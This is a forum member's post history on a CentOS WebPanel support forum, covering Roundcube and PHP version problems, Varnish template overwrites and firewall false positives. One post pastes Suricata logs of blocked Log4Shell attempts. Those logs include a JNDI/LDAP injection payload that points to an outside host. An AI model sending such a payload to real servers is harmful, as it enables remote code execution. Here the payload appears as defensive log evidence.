Messages

1

E-Mail / Re: Roundcube update not working due to php version of cwpsrv

« on: April 05, 2024, 10:53:42 AM »

OK.

@overseer

So, we all know this is a beta version so far...
It's a work in progress by the CWP team.


This is the bottom status bar after a clean install on AlmaLinux 9.3:
(Use scroll bar at bottom of message to see right side)



This is the Mail Services Tab:



This is the Mail Services Tab, AFTER manually installing AMaVis, ClamAV (* See Below), SpamAssassin



The default version of RoundCube installed:



* I installed ClamAV & ClamD from the EPEL repo, got it to enable, but keeps giving an error when trying to start.
I might or might not work on this.


Default PHP is 7.4.33 Without ionCube.
Tried to build 8.3.4, said it worked, but still on 7.4.33. So it failed.

It also installed an Old, Non-LTS version of MariaDB, 10.5.22.
10.6 & 10.11 are LTS Versions.

You need to check what php version roundcube is running on:

Code: [Select]

/usr/local/cwp/php71/bin/php -v

2

E-Mail / Re: Roundcube update not working due to php version of cwpsrv

« on: April 03, 2024, 07:52:32 PM »

Installer for CentOS 9/stream, Alma Linux 9, and Rocky Linux 9 (beta)
CWP is released for EL9 as a beta, and old PHP versions are removed i.e. only PHP 7.4 to 8.3 are supported.

Does this mean that the latest version of roundcube will already work in the CWP beta version?

3

E-Mail / Re: roundcube CVE-2023-5631

« on: November 05, 2023, 07:52:59 PM »

Roundcubemail has long been unsupported in cwp.  Now this is a security risk.  Each of my domains allows access to rouncubemail via the /webmail suffix. 

How will it turn off along with the whole roundube? 

Have you tried installing version 1.5.6?  I haven't tried it yet, but the 1.5.x series works for me, the php problem is from 1.6.x.

Edit:
I followed this guide, just change the version from 1.5.4 to 1.5.6 everywhere and it works:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-154-%E2%80%93-control-web-panel/

4

Information / Re: Roundcube version

« on: February 20, 2023, 09:40:10 AM »

What versions of roundcube are supported by cwp?  Index.php file says version 1.2.  Roundcube website lists 1.6 as the stable version.

Unfortunately version 1.5.3 is the last one working.
https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232

5

Updates / Re: How can update PHP for cwpsrv

« on: February 07, 2023, 12:17:21 PM »

https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232
I've been waiting for an update like this for months.
May there be an update sooner than the discovered CVEs in Roundcube.

Is it possible to completely remove Roundcube?

6

E-Mail / Re: Roundcube update not working due to php version of cwpsrv

« on: January 13, 2023, 12:10:54 PM »

Cwpsrv has it's own fpm.  the service is called cwpsrv-phpfpm and cwp-phpfpm  They use /usr/local/cwp/php71 (It's actually 7.2).  I'm working on an update for you, but work 60 hours a week, so not a lot of time

Do you know when the new version of Roundcube will be available? How to completely disable Roundcube in CWP when CVE vulnerabilities appear in outdated version 1.5.3

7

How to / Re: Cronjob for WPallimport

« on: August 09, 2022, 09:48:37 AM »

I use curl and it works. Connect via ssh and type in the console, or show the cron logs.

8

E-Mail / Re: Roundcube update not working due to php version of cwpsrv

« on: July 29, 2022, 09:39:22 AM »

I wanted to update roundcube to 1.6 but roundcube requires a minimum php 7.3 version. Unfortunately version 1.5.3 is the last one working.

9

CSF Firewall / Re: lfd: (WPLOGIN) WP Login Attack (false positives)

« on: May 14, 2022, 12:18:55 PM »

I have the same problem.  My wordpress has an additional security of 2fa.  Therefore, each login generates two entries.  Just log in-> log out-> log in again to be blocked.  Preventing my country from being blocked is not a good solution.

10

CentOS-WebPanel Bugs / Re: Problem with VARNISH config files .... and CWP update to new version

« on: January 26, 2022, 09:58:00 PM »

Hi friends ...

We have had some problems with varnish ...
----------------------------------------------------
Error 503 Backend fetch failed

Backend fetch failed
Guru Meditation:

XID: 1279924
----------------------------------------------------

we use webserver configuration nginx-varnish-apache-php-fpm...
after some study/investigation of internet we found recomendations some changes in config files ...

we have added them to the files in: /etc/varnish/default.vcl
and we have added them have updated files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl


then we have updated all domains in CWP > WebServers Domain Conf
And all changes  from default.vcl or default.tpl were updated in files in all fomain files: /etc/varnish/conf.d/vhosts

After this was everything OK and Error 503 Backend fetch failed .... they came only very rarely ....


But the biggest that after some time (may be after CWP update) the config files were rewrited to old ones ...
files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl
and
all fomain files: /etc/varnish/conf.d/vhosts

all our changes were lost ...

Please why

we think that it is very BAD!!!

CAn you do something with this

Thank

Juraj

I have the same problem with varnish, can I ask for information what should be changed in these templates?

11

CentOS 7 Problems / Re: log4j security issue

« on: December 13, 2021, 11:40:31 AM »

External firewall

12

CentOS 7 Problems / Re: log4j security issue

« on: December 13, 2021, 11:15:44 AM »

I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.

Code: [Select]

2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}

13

CentOS-WebPanel GUI / Re: Security incidents will not load

« on: November 29, 2021, 07:13:29 AM »

Security incidents will not load in CWPpro version: 0.9.8.1102

Code: [Select]

Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at HTMLDocument.<anonymous> (index.php?module=security_center:2881)
    at n (js.php:2)
    at Object.fireWith (js.php:2)
    at Function.ready (js.php:2)
    at HTMLDocument.B (js.php:2)

14

CentOS-WebPanel GUI / Security incidents will not load

« on: November 23, 2021, 12:53:39 PM »

Security incidents will not load in CWPpro version: 0.9.8.1102